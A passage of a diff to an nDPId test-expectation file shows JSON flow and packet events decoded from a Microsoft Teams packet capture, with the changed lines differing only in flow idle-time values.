+01172{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":186,"source":"teams.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1587041677243,"flow_last_seen":1587041677269,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6239,"flow_avg_l4_payload_len":519,"midstream":0,"thread_ts_msec":1587041677269,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60536,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.microsoft.com","server_names":"teams.microsoft.com","ja3":"74d5fa154a7fc0a7c655d8eaa34b89bf","ja3s":"0f14538e1c9070becdad7739c67d6363","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 
4","subjectDN":"CN=teams.microsoft.com","alpn":"h2,http\/1.1","fingerprint":"68:1E:E8:3C:83:70:6F:E3:86:F4:E8:8C:C4:E6:A0:9A:3E:E0:9C:0E"}} +00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":403,"source":"teams.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1587041677380,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041677380,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGPCzAqAEGlZqnW+SlAbsZTPC8DAoX91AUECaMmwAA"} 00184{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":607,"source":"teams.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1587041677408} 00357{"packet_event_id":1,"packet_event_name":"packet","packet_id":607,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041677401,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00820{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":608,"source":"teams.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1587041677422,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":321,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":321,"pkt_l4_len":287,"thread_ts_msec":1587041677422,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWrCABFAAEzES5AAEARZ+PAqAAB\/\/\/\/\/wBEAEMBHwAAAQEGADtdrMEAAIAAAAAAAAAAAAAAAAAAAAAAANgNF9ZVqwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwIBAwwJVEwtU0cxMTZFPAlUTC1TRzExNkU9BwHYDRfWVav\/"} 
00181{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":617,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041677611} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":617,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041677424,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":618,"source":"teams.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041678029,"flow_last_seen":1587041678029,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041678029,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60537,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":618,"source":"teams.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1587041678029,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041678029,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG93bAqAEGNHJNIex5Abv0H+uOAAAAALAC\/\/9XkAAAAgQFtAEDAwUBAQgKMISdwwAAAAAEAgAA"} 
-00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":619,"source":"teams.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1587041678074,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041678074,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8KlZAAGwGoSQ0ck0hwKgBBgG77Hk7ZXhQ9B\/rj6ASIAAz8QAAAgQFoAEDAwgEAggKYRL\/2zCEncM="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":620,"source":"teams.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1587041678074,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041678074,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG94LAqAEGNHJNIex5Abv0H+uPO2V4UYAQEAlydQAAAQEICjCEne9hEv\/b"} -00971{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":621,"source":"teams.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041678029,"flow_last_seen":1587041678074,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041678074,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60537,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-01500{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":625,"source":"teams.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1587041678029,"flow_last_seen":1587041678120,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4409,"flow_avg_l4_payload_len":551,"midstream":0,"thread_ts_msec":1587041678120,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60537,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}} 
+00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":618,"source":"teams.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041678029,"flow_last_seen":1587041678029,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041678029,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60537,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":618,"source":"teams.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1587041678029,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041678029,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG93bAqAEGNHJNIex5Abv0H+uOAAAAALAC\/\/9XkAAAAgQFtAEDAwUBAQgKMISdwwAAAAAEAgAA"} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":619,"source":"teams.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1587041678074,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041678074,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8KlZAAGwGoSQ0ck0hwKgBBgG77Hk7ZXhQ9B\/rj6ASIAAz8QAAAgQFoAEDAwgEAggKYRL\/2zCEncM="} 
+00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":620,"source":"teams.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1587041678074,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041678074,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG94LAqAEGNHJNIex5Abv0H+uPO2V4UYAQEAlydQAAAQEICjCEne9hEv\/b"} +00971{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":621,"source":"teams.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041678029,"flow_last_seen":1587041678074,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041678074,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60537,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+01500{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":625,"source":"teams.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1587041678029,"flow_last_seen":1587041678120,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4409,"flow_avg_l4_payload_len":551,"midstream":0,"thread_ts_msec":1587041678120,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60537,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}} 00181{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":644,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041678611} 
00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":644,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041678303,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":645,"source":"teams.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041679059,"flow_last_seen":1587041679059,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1587041679059,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":64046,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
@@ -87,10 +87,10 @@ 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":664,"source":"teams.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041680216,"flow_last_seen":1587041680216,"flow_idle_time":180000,"flow_min_l4_payload_len":355,"flow_max_l4_payload_len":355,"flow_tot_l4_payload_len":355,"flow_avg_l4_payload_len":355,"midstream":0,"thread_ts_msec":1587041680216,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00927{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":664,"source":"teams.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1587041680216,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":397,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":397,"pkt_l4_len":363,"thread_ts_msec":1587041680216,"pkt":"\/\/\/\/\/\/\/\/AICPmq69CABFAAF\/44MAAEARlesAAAAA\/\/\/\/\/wBEAEMBa5dnAQEGABWCmMYYtQAAAAAAAAAAAAAAAAAAAAAAAACAj5quvQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBPRP\/j5quvQABAAEfyzfOuCfrPQjbUAB0AQE5AgXcPC1kaGNwY2QtNi4xMC4xOkxpbnV4LTQuOS41Ny12Nys6YXJtdjdsOkJDTTI4MzUMDHBpMy5udG9wLm9yZ5EBATcPAXkhAwYMDxocKjM2Ojt3\/w=="} 
00693{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":664,"source":"teams.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041680216,"flow_last_seen":1587041680216,"flow_idle_time":180000,"flow_min_l4_payload_len":355,"flow_max_l4_payload_len":355,"flow_tot_l4_payload_len":355,"flow_avg_l4_payload_len":355,"midstream":0,"thread_ts_msec":1587041680216,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"","fingerprint":"","class_ident":""}} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":665,"source":"teams.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041680294,"flow_last_seen":1587041680294,"flow_idle_time":7440000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":1,"thread_ts_msec":1587041680294,"l3_proto":"ip4","src_ip":"93.62.150.157","dst_ip":"192.168.1.6","src_port":443,"dst_port":60512,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00519{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":665,"source":"teams.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1587041680294,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"thread_ts_msec":1587041680294,"pkt":"KDc3AG3IEBMx8Tl2CABFAABYCTNAAHEGSuNdPpadwKgBBgG77GBJd2ZkkI5L3oAY\/\/uUpgAAAQEICsJ1bW4wg\/kbFwMDAB8AAAAAAAAABVYf48xkHJTZ\/YMO7dmv4tC6Gofi60hR"} 
-00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":666,"source":"teams.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1587041680294,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041680294,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGhUbAqAEGXT6WnexgAbuQjkveAAAAAFAEAAAvzgAA"} -01944{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":667,"source":"teams.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1587041680294,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1156,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1156,"pkt_l4_len":1122,"thread_ts_msec":1587041680294,"pkt":"KDc3AG3IEBMx8Tl2CABFAAR2CTRAAHEGRsRdPpadwKgBBgG77GBJd2aIkI5L3oAY\/\/v9PwAAAQEICsJ1bW4wg\/kbFwMDBD0AAAAAAAAABm9iu+t9XgqZR4s0F3BUPHh3OFodjBrwIjhJ5jzUDrtlDVli1SVxk270m+gEbse5EGdXD2tQPqX+uNfx4B7otIIyfqifH2S\/KFxGyKDkumEYrUX2hsTy4AvsIXg77ggsd77nUCYIUkr9Dcu1K8XBBisxPpHT+zWCDZADIu9GEbXV2\/9sowiGe8yrlpVrokOfQ1DpsHmZowwlG7Bi36UFm+L5Z6cwifqjKB8bGHxJp5qTVRJD\/elikR43sBRzkZfcKqYDSp7JYzhK3QKUfc6m5GUQ5dfnLhv5nlfAs74UtmJ5EyjXuAHe9YxanSSvzzG4JMTWGAY5tTjjtYwpZihFAGx52HToq2O+CpcbwPHV1TLQUDbT2yGJc7gM1GLG5aFGzYu4CebCnnBl2NsUqq80dM5DZBgWZFtSy9z2NYnNFnXM\/L50k82dbGP\/hbFfCNFMS6BvXhwvqUQidPN2cRmVwTsWXaFgKlMTAFoatWZ\/LRmGoWBdnNparAnK8NJzgtzGWejWpNSxsXZQ1NSy\/4QwWmZ1aiyH3lAZfsyIjqYBH478mZLwQeLwCsFzK39ybhvc8awbkRiAIoeLHCDrqRPBNhP62oMKfuuybYfQO5cgeLBcoVWj4YmTHvVqXUaiIJM0ecCweYrE28c1bMOuRYrnD6X5H1vOaut8zUARe+SwmWED1FAd9+LaLocuQm5mzrdNkB6aXE4s0lhsnmXfrvdjFstoXCwJT0nh7ITIpoT2HCapxHTDXopSW+f6iqr0aTti5yh8nUUMgZZ++9jn1o3T3lmRclm9+mgQdUUmHkA3dQCgvlVHN9ZAWzkNyqS56Hs+VXyhIUgDoTONh43ut\/yBnqLWJ6HXKcI6qe1ntdtXyoQyjYZpSOnm2uYp+6WFP8eztjtGexEu6hDqMx2fyQv\/mVl0auJxOvVANURsh9C6cu1LRWqw8SukcmJhO9ptW5iUNYclFK0BRMa7HDoqgqFCccb2WkU4sxDCVFF52CIMR33VkffteHiI9\/NgTNgZERM3tobFzsdXrDpRRXLWDa
ge6O7fLzs8m9hERZCv46Exgndu8ho3VvbFCaZyMsnBpC0\/L6igC1xzLSs2ksZSkx5L9Q7VhMaHlPusEBUMQJ5uA6CkdGrw0a3GiTrkSUGJIGKC7WyL+yh36GZcaflqIrfqPpArwHS0O6hsLRU\/2t+Pwt19umaYcC7QuLOwfSwEr1PxrFtzW1mzlNCKarl0LmPBlPWyV5JfN4y4C1aRVZ7yV7\/4iclnIrddqAkiXdgSc+ai4OnXQhk4fgmfh+Ar5gfpmM8U2v\/X345bEZszWOszb+cdvmzW47cwiYheg59HkuZ4TWUwEFRrPkd047noDz+bhfvXLMYNCStN2XWEGpRFtvI8rpdiTmvHc7+aKDQSaaH8jzVNbso1cSOHqJjXtpeD+vrVfOMXgQ=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":665,"source":"teams.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041680294,"flow_last_seen":1587041680294,"flow_idle_time":7560000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":1,"thread_ts_msec":1587041680294,"l3_proto":"ip4","src_ip":"93.62.150.157","dst_ip":"192.168.1.6","src_port":443,"dst_port":60512,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00519{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":665,"source":"teams.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1587041680294,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"thread_ts_msec":1587041680294,"pkt":"KDc3AG3IEBMx8Tl2CABFAABYCTNAAHEGSuNdPpadwKgBBgG77GBJd2ZkkI5L3oAY\/\/uUpgAAAQEICsJ1bW4wg\/kbFwMDAB8AAAAAAAAABVYf48xkHJTZ\/YMO7dmv4tC6Gofi60hR"} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":666,"source":"teams.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1587041680294,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041680294,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGhUbAqAEGXT6WnexgAbuQjkveAAAAAFAEAAAvzgAA"} 
+01944{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":667,"source":"teams.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1587041680294,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1156,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1156,"pkt_l4_len":1122,"thread_ts_msec":1587041680294,"pkt":"KDc3AG3IEBMx8Tl2CABFAAR2CTRAAHEGRsRdPpadwKgBBgG77GBJd2aIkI5L3oAY\/\/v9PwAAAQEICsJ1bW4wg\/kbFwMDBD0AAAAAAAAABm9iu+t9XgqZR4s0F3BUPHh3OFodjBrwIjhJ5jzUDrtlDVli1SVxk270m+gEbse5EGdXD2tQPqX+uNfx4B7otIIyfqifH2S\/KFxGyKDkumEYrUX2hsTy4AvsIXg77ggsd77nUCYIUkr9Dcu1K8XBBisxPpHT+zWCDZADIu9GEbXV2\/9sowiGe8yrlpVrokOfQ1DpsHmZowwlG7Bi36UFm+L5Z6cwifqjKB8bGHxJp5qTVRJD\/elikR43sBRzkZfcKqYDSp7JYzhK3QKUfc6m5GUQ5dfnLhv5nlfAs74UtmJ5EyjXuAHe9YxanSSvzzG4JMTWGAY5tTjjtYwpZihFAGx52HToq2O+CpcbwPHV1TLQUDbT2yGJc7gM1GLG5aFGzYu4CebCnnBl2NsUqq80dM5DZBgWZFtSy9z2NYnNFnXM\/L50k82dbGP\/hbFfCNFMS6BvXhwvqUQidPN2cRmVwTsWXaFgKlMTAFoatWZ\/LRmGoWBdnNparAnK8NJzgtzGWejWpNSxsXZQ1NSy\/4QwWmZ1aiyH3lAZfsyIjqYBH478mZLwQeLwCsFzK39ybhvc8awbkRiAIoeLHCDrqRPBNhP62oMKfuuybYfQO5cgeLBcoVWj4YmTHvVqXUaiIJM0ecCweYrE28c1bMOuRYrnD6X5H1vOaut8zUARe+SwmWED1FAd9+LaLocuQm5mzrdNkB6aXE4s0lhsnmXfrvdjFstoXCwJT0nh7ITIpoT2HCapxHTDXopSW+f6iqr0aTti5yh8nUUMgZZ++9jn1o3T3lmRclm9+mgQdUUmHkA3dQCgvlVHN9ZAWzkNyqS56Hs+VXyhIUgDoTONh43ut\/yBnqLWJ6HXKcI6qe1ntdtXyoQyjYZpSOnm2uYp+6WFP8eztjtGexEu6hDqMx2fyQv\/mVl0auJxOvVANURsh9C6cu1LRWqw8SukcmJhO9ptW5iUNYclFK0BRMa7HDoqgqFCccb2WkU4sxDCVFF52CIMR33VkffteHiI9\/NgTNgZERM3tobFzsdXrDpRRXLWDage6O7fLzs8m9hERZCv46Exgndu8ho3VvbFCaZyMsnBpC0\/L6igC1xzLSs2ksZSkx5L9Q7VhMaHlPusEBUMQJ5uA6CkdGrw0a3GiTrkSUGJIGKC7WyL+yh36GZcaflqIrfqPpArwHS0O6hsLRU\/2t+Pwt19umaYcC7QuLOwfSwEr1PxrFtzW1mzlNCKarl0LmPBlPWyV5JfN4y4C1aRVZ7yV7\/4iclnIrddqAkiXdgSc+ai4OnXQhk4fgmfh+Ar5gfpmM8U2v\/X345bEZszWOszb+cdvmzW47cwiYheg59HkuZ4TWUwEFRrPkd047noDz+bhfvXLMYNCStN2XWEGpRFtvI8rpdiTmvHc7+aKDQSaaH8jzVNbso1cSOHqJjXtpeD+vrVfOMXgQ=="} 
